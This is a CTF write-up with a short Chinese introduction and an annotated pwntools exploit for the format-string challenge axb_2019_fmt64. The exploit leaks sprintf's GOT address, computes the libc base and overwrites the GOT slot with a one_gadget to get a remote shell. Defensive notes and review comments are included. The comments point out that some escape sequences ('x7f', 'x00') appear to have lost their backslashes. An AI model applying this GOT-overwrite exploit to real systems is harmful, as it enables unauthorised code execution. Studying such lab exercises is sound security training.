axb_2019_fmt64

exp

有格式化字符串漏洞,泄露got表地址,改sprintf为one_gadget,当函数再次调用sprintf即可拿shell。(使用格式化漏洞任意写的时候注意printf已经先输出了9个字符,要减去)

from pwn import *

# Format-string walkthrough for the BUUOJ challenge axb_2019_fmt64 (Python 2 / pwntools).
#
# Vulnerability class: user input reaches a printf-family call as the *format*
# argument, so '%N$s' / '%N$hn' read and write through pointers the attacker
# places on the stack. Two stages are used here: (1) read sprintf's GOT entry
# to leak a libc address, (2) write a one_gadget address into that GOT slot.
#
# Defender's notes (what stops this): pass input as data, never as the format
# (printf("%s", buf)); build with -Wformat-security / -Werror=format-security
# so the dangerous call is a compile error; link with full RELRO (-z relro
# -z now) so the GOT is read-only and the stage-2 overwrite faults instead of
# redirecting control flow.

#context.log_level = 'debug'

#io = process('./idaidg/linux_server64')
# Remote instance of the challenge; the two commented lines above/below are
# the local-process variants used while developing the script.
io = remote('node3.buuoj.cn',29548)
#io = process('axb_2019_fmt64')
# Challenge binary, used only to resolve the GOT slot of sprintf.
elf = ELF('./axb_2019_fmt64')
#libc = elf.libc
# The remote's libc (2.23); used to turn the leaked sprintf address into the
# libc base.
libc = ELF('./libc/libc-2.23.so')

# Candidate one_gadget offsets for this libc build; only the first one is used
# (line below selects index 0).
one_gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
# Address of sprintf's GOT entry in the (non-PIE) binary: both the leak target
# and the overwrite target.
sprintf_got = elf.got['sprintf']

# Stage 1 (read): '%9$s' dereferences the 9th format argument as a char*.
# 'aaaa' pads the text to 8 bytes so the packed pointer that follows is
# qword-aligned on the stack; that pointer is the GOT slot, so the string
# printed is sprintf's resolved libc address.
# NOTE(review): the choice of argument index 9 is taken from the original
# post; it depends on the stack layout of this binary and is not derivable
# from this file.
payload = '%9$saaaa'
payload += p64(sprintf_got)

io.recvuntil("Please tell me:")
io.sendline(payload)

# Pull the leaked pointer out of the reply: a 2.23 libc address on x86-64 ends
# in a 0x7f byte, so read up to it, keep the last 6 bytes, and zero-extend to
# 8 bytes for u64.
# NOTE(review): 'x7f' and 'x00' here (and 'x00' below) look like '\x7f' /
# '\x00' with the backslash lost in extraction — check against the original
# post before treating this listing as verbatim.
sprintf_addr = u64(io.recvuntil('x7f')[-6:].ljust(8,'x00'))

print "sprintf_addr:"+hex(sprintf_addr)

# libc base = leaked address - symbol offset inside libc; then the absolute
# address of the first one_gadget candidate.
libcbase = sprintf_addr - libc.symbols['sprintf']
one_gadget = libcbase + one_gadget[0]

print "one_gadget:"+hex(one_gadget)

# Stage 2 (write): two '%hn' writes of 16 bits each into the GOT slot.
#   %12$hn -> sprintf_got     (low 16 bits of one_gadget)
#   %13$hn -> sprintf_got + 2 (next 16 bits of one_gadget)
# '%<count>c' pads the output so the running character count equals the value
# to be stored. The '- 9' on the first count accounts for the 9 characters the
# program has already printed before the payload (as the write-up states).
# The second count is the delta between the high and low halves, since %hn
# stores the cumulative count and only the low 16 bits of it are kept.
payload = ''
payload += '%' + str((one_gadget % 0x10000) - 9) + 'c%12$hn'
payload += '%' + str(((one_gadget >> 16) % 0x10000) - (one_gadget % 0x10000)) + 'c%13$hn'
# Pad the format text to 0x20 bytes so the two target pointers that follow sit
# at the stack positions addressed as arguments 12 and 13.
payload = payload.ljust(0x20,'x00')
payload += p64(sprintf_got) + p64(sprintf_got + 2)

print 'payload:'+payload

io.sendline(payload)

# The next call through sprintf's GOT entry now lands on the one_gadget;
# hand the connection to the user.
io.interactive()

原文地址:https://www.cnblogs.com/luoleqi/p/13413891.html